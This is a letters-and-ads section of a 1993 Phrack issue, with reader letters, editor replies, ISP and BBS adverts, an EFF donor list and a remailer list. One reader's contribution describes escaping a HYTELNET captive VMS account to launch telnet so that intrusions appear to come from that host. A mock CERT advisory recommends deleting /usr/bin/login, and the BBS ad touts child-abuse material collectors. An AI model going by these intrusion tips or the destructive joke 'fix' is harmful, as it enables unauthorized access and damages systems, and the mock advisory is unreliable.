"make yourself" [Yep.I totally wrote program which gets file listing from target vicitim's home directory in current host. After that I decided to contribute it for You. I hope this will help. Here is the complete C code. "rx" permission in target's '$HOME' required.]. Looking similar articles like "... off Geek!" and various reports which don't reacheds PWN. [CENSORED BY ME]. Resulting from abovewritten reason and I let myself to add some elite (oops word too complex), some bogus and little deposit to Your lb. He written in classic plagiarize style. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! * * * Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what it is horrible (don't read it please - this message to Bart), but I doing it all the time (today already 3 month). I have not much time to write, and here is the subject - I broke into one military computer and stole their mail about new security bug!!! l00k f3r |t: - - - DDN & CERT SPECIAL REPORT* Sun 3.x,4.1.x login flaw Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX and many yet unknown systems) Impact: Allow random intruders to gain "root" access. Description: The huge security hole was there and waiting! Type: $ login root [ no option required ], and You are! All what You need to know its just root's password, but it (pw), sure, can be easily obtained from real root, by asking him (root). Ex - "$ talk root" Possible fix until copyrighted patch come out: #rm /usr/bin/login #cp /usr/games/fortune /usr/bin/login If you believe that your system has been compromised, contact CERT CC. Call our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in time of "Silence of the Lamb"), leave Inet address of your system and number of private credit card. - - - * Report not will be printed in cert advisories in this form, becouse FBI need remove all hints and tips, and make him useless to intruders. DISCLAIMER: Above document written by CERT, DDN and FBI - all pretension to them. Thanks to gr*k (I can't write his full name for security reasons),roxtar, y0,Fidelio,2 scotts from Santafe,KL (He not have attitude towards this mail,but I included him for polite since he reserved tickets for me to SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for hints to me, what this bug really exist (Yep, before I stoled report). - Write You later - anonymous. P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK and sure Erik Bloodaxe. And also - IF after E911 incident you are more carefully, feel free to replace "stole" to "got" (when you'll post it), and do not forget to add "reprinted with permission". - Sincerely, anonymous. ---------------------------------------------------------------------- [Editor: More indications that we will all be raided by the DEA more often than the FBI in coming years.] ***************************************************************************** "Since my probation status forces me to be adamant about this. Illegal activities on Netsys cannot and will not be tolerated. Prison sucked." - Len Rose 06/6/93 NETSYS COMMUNICATION SERVICES Palo Alto, California Netsys is a network of large Sun servers dedicated to providing Internet access to individuals and corporations that need solid, reliable Internet connectivity. Netsys is at the hub of major Internet connectivity. Netsys is a system for professionals in both the Internet and Unix community. The public image is important to us. Illegal activities cannot be tolerated. Netsys has every feature you could possibly need. Netsys is lightly loaded, extremely reliable and dedicated to providing full time 24 hour Internet access. Support: 24 hour emergency response service. Dialups: Palo Alto area, High Speed (V.32 and PEP) Private Accounts: $20 monthly ( with file storage capacity of 5 megabytes) $1 per megabyte per month over 5 megabytes. Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes) $1 per megabyte per month over 10 megabytes. Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic newsgroups, and including all foreign newsgroups. SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE Satellite Weather: Netsys has available real time satellite weather imagery. Images are available in gif, or Sun raster format. Contact us for NFS mirroring, and other special arrangement. These images are directly downlinked from the GOES bird. Contact Steve Eigsti (steve@netsys.com) Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service for large volume news distribution. Members of Netsys can obtain substantial discounts for the purchase and service costs of this revolutionary method of Usenet news distribution. Both Unix and MS Windows software available. Contact (pagesat@pagesat.com) for product information. Paging Services: Netsys is offering Pagesat's Internet to Pager mail service. Members of Netsys can obtain critical email to pager services. Pagesat has the ability to gateway any critical electronic mail to your display pager. Leased Line Internet Connections Pagesat Inc. offers low cost 56k and T1 Internet connections all over the United States. Since Pagesat is an FCC common carrier, our savings on leased lines can be passed on to you. For further information, contact Duane Dubay (djd@pagesat.com). We offer other services such as creating domains, acting as MX forwarders, and of course uucp based newsfeeds. Netsys is now offering completely open shell access to Internet users. For accounts, or more information , send mail to netsys@netsys.com Netsys will NEVER accept more members than our capacity to serve. Netsys prides itself on it's excellent connectivity (including multiple T1's, and SMDS), lightly loaded systems, and it's clientele. We're not your average Internet Service Provider. And it shows. -------------------------------------------------------------------- [Editor: We here at Phrack are forever in debt to Mr. Len Rose for allowing us to use ftp.netsys.com as our new official FTP site after getting the boot off EFF. It takes a steel set of huevos to let such an evil hacker publication reside on your hard drive after serving time for having dealings with evil hackers. We are STOKED! Thanks Len! Netsys is not your average site, INDEED!] **************************************************************************** Something Phrack might like to see: The contributors to and practices of the Electronic Frontier Foundation disclose quite accurately, just who this organization represents. We challenge the legitimacy of the claim that this is a "public interest" advocate. Here is a copy of their list of contributors: [FINS requested the Office of the Attorney General of the Commonwealth of Massachusetts to provide us with a list of contributors of over $5000, to the Electronic Frontier Foundation, required by IRS Form 990. Timothy E. Dowd, of the Division of Public Charities, provided us with a list (dated January 21, 1993), containing the following information. No response was given to a phone request by FINS directly to EFF, for permission to inspect and copy the most current IRS Form 990 information.] ELECTRONIC FRONTIER FOUNDATION, INC. IRS FORM 990. PART I - LIST OF CONTRIBUTIONS NAME AND ADDRESS OF CONTRIBUTOR CONTRIBUTION DATE AMOUNT Kapor Family Foundation C/O Kapor Enterprises, Inc. 155 2nd Street Cambridge, MA 02141 Var 100,000 Mitchell D. Kapor 450 Warren Street Brookline, MA 02146 Var 324,000 Andrew Hertzfeld 370 Channing Avenue Palo Alto, CA 94301 12/12/91 5,000 Dunn & Bradstreet C/O Michael F. ... 1001 G Street, NW Suite 300 East Washington, DC 20001 02/12/92 10,000 National Cable Television 1724 Massachusetts Avenue, NW Washington, DC 20036 02/18/92 25,000 MCI Communications Corporation 1133 19th Street, NW Washington, DC 20036 03/11/92 15,000 American Newspaper Publishers Association The Newspaper CTR 11600 Sunrise Valley Reston, VA 22091 03/23/92 20,000 Apple Computer 20525 Mariani Avenue MS:75-61 Cupertino, CA 95014 03/23/92 50,000 Sun Microsystems, Inc c/o Wayne Rosing 2550 Garcia Ave Mountain View, CA 94043-1100 04/03/92 50,000 Adobe Systems, Inc. c/o William Spaller 1585 Charlestown Road Mountain View, CA 94039-7900 04/16/92 10,000 International Business Systems c/o Robert Carbert, Rte 100 Somers, NY 10589 05/07/92 50,000 Prodigy Services Company c/o G. Pera... 445 Hamilton Avenue White Plains, NY 10601 05/07/92 10,000 Electronic Mail Associates 1555 Wilson Blvd. Suite 300 Arlington, VA 22209 05/13/92 10,000 Microsoft c/o William H. Neukom 1 Microsoft Way Redmond, VA 98052 06/25/92 50,000 David Winer 933 Hermosa Way Menio Park, CA 94025 01/02/92 5,000 Ed Venture Holdings c/o Ester Dvson 375 Park Avenue New York, NY 10152 03/23/92 15,000 Anonymous 12/26/91 10,000 Bauman Fund c/o Patricia Bauman 1731 Connecticut Avenue Washington, DC 20009-1146 04/16/92 2,500 Capital Cities ABA c/o Mark MacCarthy 2445 N. Street, NW Suite 48 Washington, DC 20037 05/04/92 1,000 John Gilmore 210 Clayton Street San Francisco, CA 94117 07/23/91 1,488 08/06/91 100,000 Government Technology 10/08/91 1,000 Miscellaneous 04/03/91 120 Apple Writers Grant c/o Apple Computer 20525 Mariani Avenue 01/10/92 15,000 [Editor: Well, hmmm. Tell you guys what: Send Phrack that much money and we will give up our ideals and move to a new location, and forget everything about what we were all about in the beginning. In fact, we will turn our backs on it. Fair? I was talking about me moving to Europe and giving up computers. Don't read anything else into that. Nope.] **************************************************************************** -----BEGIN PGP SIGNED MESSAGE----- Q1: What cypherpunk remailers exist? A1: 1: hh@pmantis.berkeley.edu 2: hh@cicada.berkeley.edu 3: hh@soda.berkeley.edu 4: nowhere@bsu-cs.bsu.edu 5: remail@tamsun.tamu.edu 6: remail@tamaix.tamu.edu 7: ebrandt@jarthur.claremont.edu 8: hal@alumni.caltech.edu 9: remailer@rebma.mn.org 10: elee7h5@rosebud.ee.uh.edu 11: phantom@mead.u.washington.edu 12: hfinney@shell.portal.com 13: remailer@utter.dis.org 14: 00x@uclink.berkeley.edu 15: remail@extropia.wimsey.com NOTES: #1-#6 remail only, no encryption of headers #7-#12 support encrypted headers #15 special - header and message must be encrypted together #9,#13,#15 introduce larger than average delay (not direct connect) #14 public key not yet released #9,#13,#15 running on privately owned machines ====================================================================== Q2: What help is available? A2: Check out the pub/cypherpunks directory at soda.berkeley.edu (128.32.149.19). Instructions on how to use the remailers are in the remailer directory, along with some unix scripts and dos batch files. Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions. ====================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.2 iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9 lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy Y6Zv0kk/7rs= =simY -----END PGP SIGNATURE----- [Editor: We suggest that everyone go ahead and get the info file from soda.berkeley.edu's ftp site. While you are there, take a look around. Lots of groovy free stuff.] ==Phrack Magazine== Volume Four, Issue Forty-Three, File 3 of 27 Phrack Loopback Part II ====================================================================== ToneLoc T-Shirt Offer ====================================================================== Yes, the rumors are true: A ToneLoc t-shirt is at last available. The shirt is an extra large, 100% cotton Hanes Beefy-T, silk screened with four colors on front and eight colors on back. The front features an "anti-bell" logo, with your favorite corporate symbol in blue under a slashed circle in red. The ToneLoc logo appears above, with an appropriate quote below. The back has six Tonemaps, visual representations of exchange scans, contributed by ToneLoc'ers from around the globe. The exchange and scanner's handle is printed below each Tonemap. The handles of the beta testing team are listed below the maps. If you act now, a free copy of the latest release of ToneLoc will be included with your order! Please specify 3.5" or 5.25" disks. $15 postpaid; add $5 for international orders. Make your check or money order payable to "ToneLoc Shirt." Send to: ToneLoc Shirt 12407 Mopac Expwy N #100-264 Austin, TX 78758 Voice Mail (24 hours): 512-314-5460 - Mucho Maas - Minor Threat [Editor: I have one of these. The only hacker program immortalized in cotton. Nifty!] ****************************************************************************** The return of a telecom legend... &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& && &&&&&&& &&&&& &&&&&&&&&&& &&&&&&&&& &&&&&&&&&&&&&& &&&&&&&& && &&&&& &&&&&&&&& &&&&& &&&&& && &&&&&&&& &&&&&&&&&&&&& &&&&&&& && &&& &&&&&&&&& &&&& &&&& && &&&&&&& && &&&&&&&& && & &&&&&& && & & & &&&&&&&&& &&& & &&& && &&&&&&& && &&&&&&&& && && &&&&& && && && && && && &&& && && &&&&&&& && &&&&&&&& && &&& &&&& && &&& &&& && &&&&& && &&& && && &&&&&&& && && &&&&& && &&&& &&& && &&&&&&& && &&&&& && &&& && && &&&&&&& && && &&&& && &&&&& && && &&&&&&& && &&&&& && && && &&&&&&& && && &&& && &&&&& && && &&&&&&& && &&&&&&&&& &&& && && &&&&&&& && && && && &&&& &&& && &&&&&&& && &&&&&&&&& &&& && && && && & & && &&& &&&& && &&&&&&& && &&&&&&& &&& && &&&&&&&&&&& && && && && && &&&&& && &&&&&&& && &&&&&&&&& &&& && &&&&&&&&&&& && && &&& && & &&&&&& && &&&&&&& && &&&&&&&&&&&&&&& &&&&&&&&&&& && &&&&&&&& && &&&&&&& && &&&&&&& &&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&& && &&&&&&&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& S O U T H W E S T A Neon Knights/Metal Communications Experience cDc _ _ ((___)) [ x x ] cDc \ / cDc (' ') (U) '..and none but the Bovine survived the onslaught' -cDc- CULT OF THE DEAD COW -cDc- cDc communications -cDc- D0PE SYSTEM -cDc- --------------------------- Very K-Rad 713-468-5802 No Lame Ratios Running Baphomet Sysd00d : Drunkfux 86,400 Seconds A Day OoOOooOdlez o' T-Files The Official HoHoCon BBS New Pimping Tips Every Day Tonz o' Nifty Ascii Pictures Talk To Satan Himself.. Live!! Free 5-Digit Metro K0DEZ For All d0Pe Gifs Of Gail Thackeray Online Read Hate Filled Nazi Skinhead Poemz Home Of K-RAP : The K-Rad Ascii Possee Learn How To Make Money! Just Ask Byron! Necropheliacs & Kidporn Kollekt0rz Welcome Y0 Y0 Y0 Lonely D00dz! We gotz girlie uzerz! Lots Of Message Bases With Really K-KeWL Names Is This Whole "Volcano Ad" Thing Stupid Or What? GNU Warez From The Future! We Have A Time Machine! I Think We Have One Of Those Big, EL8 Drive Thingies No Net Access? Submit Your cDc & Phrack Articles Here! The Only System Authorized By The Debbie Gibson Fan Club The Neon Knights Did NOT Die, We Just Went Way Underground This Thing Is Starting To Look Like That Album St0nerzz Like Mega KooL Games Like Lemonade Stand And Hunt The Wumpus Deluxe Hey! It's The Mashed Potato Mountain Thing From Close Encounters Users Include Lots Of Elite Peoplez You See On Shows Like Dateline That Really Trendy Super High Speed Modem All Those Warez DooDz Have cDc / CuD / dFx / Neon Knights / NIA / Phrack / uXu / Video Vindicator Telco / Systems / Networks / Security / Cellular / Satan / Death / K0DEZ *************************************************************************** Hi there! As a beginner in Cyberspace & a new reader of Phrack, I just wanna say thiz... IT'S X-CELLENT DUDES!!!!!. Keep the good work!!!!!. I only have your latest issue, and I never read previous ones, so this is maybe old stuff... but I would like to see the Infonet network and Datapac covered in some of UR articles... let me know if u published something in recent issues. Greetings from South America, LawEnforcer. (yes, it's an Alias!!!) [Editor: Well, InfoNet we've never done. Any takers? Datapac I personally scanned some time ago, but almost ALL of the 100K of NUA's I found still work. Maybe someone should take my script and re-scan it. Anyone? Class? Bueler?] **************************************************************************** begin contribution------------------------------- VMS machines that have captive accounts often have accounts such as HYTELNET. This is an account which will archie for you, or take you to a few select BBSs or any of many boring things to do. You simply log in as HYTELNET, there isn't a password, and go through the menus. Now, that's where the fun begins. If you use HYTELNET to telnet anywhere, while it is connecting, simply type your local telnet escape key (something like ^\ or ^]) and then........you have a telnet prompt. Unfortunately, if you close or disconnect, it will return to the HYTELNET menus, and you can't open a new connection, since you're already connected. So, what you do is SPAWN whatever process you want.....you could SPAWN TELNET or SPAWN FTP or SPAWN anything else for that matter. SPAWN with no arguments (the shell escape) does not work, however. This works from any captive account that telnets. So, you can telnet to a VAX that has HYTELNET, log in as HYTELNET, do what I told you, and then hack to wherever, since the reports from the target site will show that HYTELNET@insert.vax.site committed the heinous crimes that you did. Kaneda end contribution-------------------------------- [Editor: Kaneda: thanks for that tidbit. Now I'm sure to get grief on IRC from someone coming from an odd site. :) Give my regards to Tetsuo. "But some day...we will be"] **************************************************************************** _ _ ((___)) [ x x ] cDc communications \ / Global Domination Update (' ') #12 - April 1st, 1993 (U) Est. 1986 New gNu NEW gnU new GnU nEW gNu neW gnu nEw releases for April, 1993: _________________________________/Text Files\_________________________________ 221: "Sickness" by Franken Gibe. Paralyzed by thoughts. Rage! Fight! Dark! 222: "A Day in the Life of Debbie G1bs0n" by The Madwoman. The pop idol faces her arch enemy on the fields of ninja combat and in the arms of love. 223: "The B!G Envelope Stuffing Scam" by Hanover Fiste. How to get money. Make Sally Struthers proud of you. 224: "The Bird" by Obscure Images. Story 'bout a sad guy who laughs at birds. It's depressing. Oi's a kooky guy. 225: "Tequila Willy's Position Paper" by Reid Fleming and Omega. Unknown to most, Tequila Willy thew his hat in the ring for the 1992 presidential election. Here's the paper detailing his positions on all the important issues. Better luck in '96, eh? 226: "Simple Cryptology" by Dave Ferret. Introductory guide to cryptology which also includes a good list of other sources to look into. 227: "Big Ol' Heaping Pile of Shit" by Suicidal Maniac. Buncha poems about lots of things. Wacky. 228: "ISDN: Fucking the Vacuum Cleaner Attachments" by Reid Fleming. Intended for _Mondo 2000_, this file drops science about everyone's favorite future phone system. 229: "The Evil Truth About Peter Pan" by Lady Carolin. It's a whole mess of things you and your puny little mind might not have noticed about this popular kiddie (hah!) story. 230: "The 2:00 O'Clock Bus" by Tequila Willy and Bambi the Usurper. Geriatric porn with some doggy flavor. _____________________________/Other Stuff to Get\_____________________________ From: cDc communications/P.O. Box 53011/Lubbock, TX 79453 This is Swamp Ratte's stuff: All the cDc t-files on disk by mail, for convenience sake! Specify MS-DOS or Apple II format 3.5" disks. $3.00 cash. cDc stickers! Same design as were flying around at HoHoCon, with the scary-lookin' cow skull. k00l. Send a SASE and 50 cents for a dozen of 'em (or just send a dollar). Weasel-MX tape! _Obvious_ 45-minute cassette. This is Swamp Ratte's funk/punk-rock/hip-hop band. It's a mess, but fun. $3.00 cash. cDc hat! Yeah, get yer very own stylin' black baseball cap embroidered with the cDc file-header-type logo on the front in white. This isn't the foam-and-mesh cheap kind of hat; it's a "6-panel" (the hat industry term) quality deal. Roll hard with the phat cDc gear. $15.00 plus a buck for postage. _Swingin' Muzak_ compilation tape! An hour of rockin' tuneage from Weasel-MX (all new for '93), Counter Culture, Acid Mirror, Truth or Consequences, Grandma's V.D., and Sekrut Squirrel. Lotsa good, catchy, energetic stuff for only $5.00 cash. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - From: FNORD! Publications/2660 Trojan Dr. #912/Green Bay, Wisconsin 54304-1235 This is Obscure Images' stuff: FNORD! 'zine #1 & #4 - $2.00 Each Shoggoth 912 #1 - $0.75 For some snarly techno grooves, send away for the new tape from Green Bay's finest (and only) technorave sensation, I OPENING! IO-Illumination Demo Tape (7 songs of joy) - $5.00 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - From: Freeside Orbital Data Network/ATTN:dFx-HoHoCon-cDc/11504 Hughes Road #124 Houston, TX 77089 This is Drunkfux's stuff: HoHoCon '92 T-Shirts : Black : XL : Elite : Stylish : Dope : Slammin' Only $15 + $2 shipping ($2.50 for two shirts). Your choice of either "I LOVE FEDS" or "I LOVE WAREZ" on front, where "LOVE" is actually a red heart, ala "I LOVE N.Y." or "I LOVE SPAM." On the back of every beautimus shirt is... dFx & cDc Present HOHOCON '92 December 18-20 Allen Park Inn Houston, Texas HoHoCon '92 VHS Video : 6 Hours : Hilariously Elite : $18 + $2 Shipping Please make all checks payable to O.I.S. Free cDc sticker with every order! w0w! - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - From: Bill's Shirt Thing/P.O. Box 53832/Lubbock, TX/79453 This is Franken Gibe's stuff: AIDS sucks! Order a catalog! Nifty t-shirts that make you happy. Proceeds go to local AIDS Resource Center. Send a $0.29 stamp for the cat'. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - From: Teach Me Violence magazine/61 East 8th St./Suite 202/New York, NY 10003 This is The Pusher's stuff: Teach Me Violence 'zine: Issue #1 (Mr. Bungle, COC, Murphy's Law) Issue #2 (Helmet, Supertouch, Agnostic Front, American Standard) Issue #3 (Faith No More, Chris Haskett, Cathedral, Iceburn, Venom) $3.00 cash each - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - From: A Day In The Life Of.../P.O. Box 94221/Seattle, WA 98124 This is Lady Carolin's stuff: A Day In The Life Of... 'zine, free with two stamps. Bi-monthly contact list of girlie bands/grrrl bands/female vocalists. $1. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - __________________________________/cDc Gnuz\__________________________________ "cDc: savin' trees in '93" Hiya once again, here's whassup: NEW Internet FTP site: zero.cypher.com. This is Drunkfux and Louis Cypher's chilly-the-most deal. Login as "anonymous" and get all the cDc stuph fast fast fast. NEW cDc Mailing list: Get on the ever-dope and slamagnifiterrific cDc mailing list! Send mail to cDc@cypher.com and include some wonderlessly elite message along the lines of, "ADD ME 2 DA MAILIN LIZT!!@&!" NEW Official cDc Global Domination Factory Direct Outlets: Cyberspace.Nexus +31-67-879307 [Belgium] Mirrorshades BBS 903/668-1777 The Ministry of Knowledge 401/043-3446 The Crowbar Hotel 713/373-4031 We're always taking t-file submissions, so if you've got a file and want to really get it out there, there's no better way than with cDc. Upload text to The Polka AE, or my Internet address, or send disks or hardcopy to the cDc post office box in Lubbock, TX. NEW updated CDCKC0W.TXT file. All the information for sysops to get going running Factory Direct Outlets. It should be available from wherever you got this Update. NEW CDCV9.ZIP is out containing cDc t-files 201-225. Factory Direct Outlet sysops should get this and put it up on their systems. See ya in May. S. Ratte' cDc/Editor and P|-|Ear13zz |_3@DeRrr "We're into t-files for the girlies and money." Write to: cDc communications, P.O. Box 53011, Lubbock, TX 79453. Internet: sratte@cypher.com, sratte@mindvox.phantom.com. [Editor: Whew. Any word on those cDc Glow in The Dark Toilet Seat Covers? I've got my 29.95 ready!] **************************************************************************** Hey there a few of us use this account and wuld like to get phrack sent to us here if at all possible... :) We are all Australians and all read your magazine to death.. a friend of mine runs a board called shred til ya ded which is basically a hpac and warez assortment... nothing 0 day but definately good for hacking info... we are in the middle of getting all of your mags online at the moment you mentioned in phrack 42 that you would like people from other countries to write pieces about the scene there... well depending on the kind of thing you want i would be more than happy to give it a go with some mates thanks Darkstar [Editor: Darkstar and anyone else--send me your files about your scenes in other countries. Nearly everyone who promised me a file about their country flaked out. You'll see who did send me a file later in this issue. Other countries: get off your duffs and send me a file! We want to know what goes on there! Boards, Busts, History, Hackers, Hangouts, Groups, Greats, Legends, Lore, EVERYTHING!] *************************************************************************** I remember seeing a message somewhere on the WELL saying an issue of Phrack carried listings of Viruses. Could you tell me which one(s)? Also, do you know of any sites which have virus listings archived ? Thanks, Jon Barber [Editor: Well, John, Phrack doesn't carry virii info. You might check around for 40hex. Personally, I think virii are vastly overrated hype driven onward by McAffee and other self-serving interests. That is why we ignore them. (That is also why I don't mention them when I lecture on computer security...they are no big thing.)] **************************************************************************** Ok, So I was reading Phrack 42's listing for SprintNET nodes... But there was no information on how to access it.. What are the ACNS For the Sprintnet? Is there a Phrack out that details use of the SprintNET.. Would appreciate ANY and ALL, as I've never heard of it being used widely like the Internet, and would like to know how to use it.. Jack Flash... [Editor: Jack...you kids are spoiled. You and your Internet. Hrumph. Remember when Arpanet was like a 20 or so Universities and Contractors, and tied to about 100 bases thru Milnet? No? Sheesh. To answer your question, Sprintnet (used to be Telenet, and always will be to me) is a public packet switched network. It can be accessed in nearly EVERY city in the USA, and in many large cities in other countries. The Toll-Free dialups are: 300-2400: 800-546-1000 9600 v.32: 800-546-2500 At the TERMINAL= prompt, type D1. Then to find a local dialup, at the @ prompt type MAIL. Login as username PHONES password PHONES.] ***************************************************************************** RE: Loop-Back I was wondering if it would be possible for you to do something on Novell LAN security, as we have one at my high school. I was also wondering about bluebox tones...in my area, if you call into the next county, sometimes you hear what sounds like bluebox tones. I had thought these lines were digital, and therefore, would not require tones of any type.. any ideas? RF Burns [Editor: As for the Novell...check later in this issue. As for the MF tones...when calls go from one area to another it is quite common to hear multi-frequency tones. Depending upon the way the call is routed, your particular pick of LD carrier and the equipment between you and the destination, you may hear these tones. You may even be one of the lucky ones, and be able to seize a trunk. Using certain LD carriers you can still box, but usually you are stuck with a trunk that can't get out of the area. Alas.] ***************************************************************************** Hi - I'm a student in the MLS program here at SUNY Albany. I found out about Phrack while researching a paper for my public policy class, on the ECPA and shit. Well, I gave a fabulous 45-minute presentation on it all and then wrote an even better paper for which I was rewarded with an A as well as an A for the class. Turns out John Perry Barlow and Mitch Kapor are heroes of my professor as well. So now I'm hooked. For my thesis I'm writing a user manual for librarians on the Internet and helping teach a class in telecommunications. Just wanted to let you phrack-types know you're my heroes and I want to be a member of the phrack phamily. Can't send any money, though. *:( Keep the faith, hopey t [Editor: That's really great! Usually profs are terribly anal about anything regarding Phrack and/or hacking. You are very lucky to have had such an instructor. Congrats on the class and good luck with your thesis!] **************************************************************************** Hi! I was just glancing through Phrack #42, and read the portion that sez that all computer professionals (essentially) have to delete this and even old copies of Phrack. Coupla questions: I'm a Network Administrator for a University, do I have to comply? It's not like I am a thug from Bellcore or anything like that. Although one of the things I am concerned with, professionally, is the security of our systems, I am no Cliff Stoll. If I were to catch an unauthorized visitor, I would give him the boot, not chase him down with prosecution in mind. I have, of course, deleted all my old Phracks as well as #42, but I would like to be able to re-snarf them. Let me know... Thanks! Dan Marner [Editor: Well, Dan, technically Phrack could quite possibly be beneficial to you and assist you with your career, and this is the typical scenario in which we request that you register your subscription and pay the registration fee. Of course, we don't have the SS as our own personal thugs to go break your legs if you don't comply. :) You might at least try to get your employer to pay for the subscription. As far as issues prior to 42 go, KEEP THEM! They are exempt from anything, and are arguably public domain.] ***************************************************************************** Hey, I need to get in touch with some Macintosh phreakers. Know any? Anyway, are there any good war dialers or scanners out there for Macintosh? I need something that picks up PBXs and VMBs as well as Carriers. Thanx in advance... [Editor: I personally avoid the little toadstools like the plague, and I was unable to get a hold of the only hacker I know who uses one. If anyone out there on the net could email us with the scoop on Mac hacking/phreaking utilities it would be most appreciated.] ***************************************************************************** Hello! I was just wondering if you knew of any FidoNet site that carries back issues of phrack. The main reason behind this, as my link through the Internet is basically through a FidoNet-type network and I am unable to ftp files. Any help would be appreciated! Thanks! Jason K [Editor: Phrack pops up everywhere. I would be very surprised if it wasn't on a ton of fido sites. However, I have no idea of what those sites may be. If anyone knows of any, let us know!] **************************************************************************** Can you give me the email address for the 2600 Magazine or whomever the person in charge. I've no idea how to contact them, so that's why I'm asking you. I'm much obliged. Thanks, MJS [Editor: 2600 magazine can be reached at 2600@well.sf.ca.us To subscribe send $21 to 2600 Subscriptions, P.O. Box 752, Middle Island, NY, 11953-0752. To submit articles write to 2600 Editorial Dept., P.O. Box 99, Middle Island, NY, 11953-0099. Note: If you are submitting articles to 2600 and to us, please have the courtesy of LETTING BOTH MAGAZINES KNOW IN ADVANCE. Ahem.] **************************************************************************** Do you know if there has been a set date and place for the next HoHoCon? Best Regards, Mayon [Editor: Actually, it's looking more and more like HoHoCon will be December 17, 18, 19 in Austin, TX. It may still be in Houston, but methinks the Big H has had about enough of dFx. We'll let you know when we know for sure.] **************************************************************************** Reporter for major metro paper is interested in help finding out anything there is to find on four prominent people who have volunteered to have their privacy breached. Financial fundamentals. Lives of crime. Aches and pains. How rich they are, where they vacation, who they socialize with. You name it, we're interested in seeing if it's out there. All for a good cause. If you're willing to advise this computer-ignorant reporter, or dig in and get the dope on these volunteers, please contact him at tye@nws.globe.com Or call at 617-929-3342. Help especially appreciated from anyone in the BOSTON area. Soon. Thanks. [Editor: Interesting. This showed up in my box in late June, so it should still be going. I would recommend watching yourselves in any dealings with journalists. Take it form one who has been burned by the press. (And who has a journalism degree himself.)] **************************************************************************** Hey there... I don't know if this will get to Dispater or to the new editor. Since the change in editorship, the proper way to contact Phrack has become sort of a mystery. (The new address wasn't included in Phrack 31.) Anyway, I'm writing to bitch about the quality of #31. I've got two main beefs: 1. The article about fake-mail was GREAT until it turned into a "how-to" primer on using the info given to cause damage. That is exactly the kind of thing that will end up getting you sued. I have some legal background, and I'm pretty sure that the author of that article and possibly even Phrack itself and its editors are now open to a damn good argument for tortuous negligence if anyone follows the instructions and damages someone on Compuserve, etc. The argument will go something like, "Phrack set into motion a chain of events that led to my client being damaged." You guys should have just given the info, and left off the moronic ways to abuse it. 2. The article on "Mall Security Frequencies" was copied directly from Popular Communications, Nov. 1992 issue. Hell, that was even their cover story. Can we say "copyright enfringement?" If not, I'm sure you'll be _hearing_ it a few more times. If I was still practicing, I'd call 'em up and ask their permission to sue on contingency. Split the damages obtained on a motion for summary judgment 50/50 with them. It would only take a week and one filed complaint... Point is, you have opened yourselves up to get sued and lose EASILY. As much as I've enjoyed reading Phrack over the years, if this new staff continues in this manner, I'll be stuck with back-issues. Cyber (305) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help@anon.penet.fi. Due to the double-blind system, any replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin@anon.penet.fi. *IMPORTANT server security update*, mail to update@anon.penet.fi for details. [Editor: I think you meant 41, not 31. But to answer your points: 1) As long as there is a first amendment, Phrack will continue to print articles that some may or may not agree with. Printing the blueprints for an atomic bomb does not make you an accomplice to those who build it and detonate it. 2) Numbers are numbers. Can we even spell "copyright infringement?" If you were still "practicing..." We at Phrack wholeheartedly encourage you to again pick it up, and keep practicing and practicing until you get whatever it is you were practicing down pat. Obviously it must have been guitar, and not law. Such a litigious society we live in. Suing Phrack would accomplish nothing. It would not even hinder its publication. Since Phrack has no money, nothing would be gained. Even if fined, Phrack could not be forced to sell its computer equipment to pay fines, since this would be removing the livelihood of the publisher, thus it would continue its quarterly publication. Where on Earth did you get such ideas? You obviously know nothing about lawsuits. Any lawyer would laugh at the thought of suing Phrack since it would gain nothing financially, and provide such a huge amount of bad publicity that even if a judgement were reached in their behalf it would not be worth it. Oh wait, you were a lawyer. Now I know why the past tense. But you are correct on one point: we cannot print copyrighted material without permission. You may have noted that last issue (among other changes) Phrack no longer includes full text of news items without prior permission from the publisher. That was the ONLY thing that worried me about publishing Phrack, and so I changed it. We at Phrack welcome constructive criticism, but at least have the nerve to email directly, rather than hide behind an anonymous remailer. That way, someone could have responded to you in a more direct and expeditious manner.] **************************************************************************** Dear Sir/Madam, I am a student at ukc in England and wish to subscribe to Phrack receiving it as email at the following address ks16@ukc.ac.uk thank you and keep up the good work. We use unix and I would be interested in getting a copy of su (switch user) which looks for the user file passwd.su in the users home directory. I don't know much about unix, but I do know it would need to 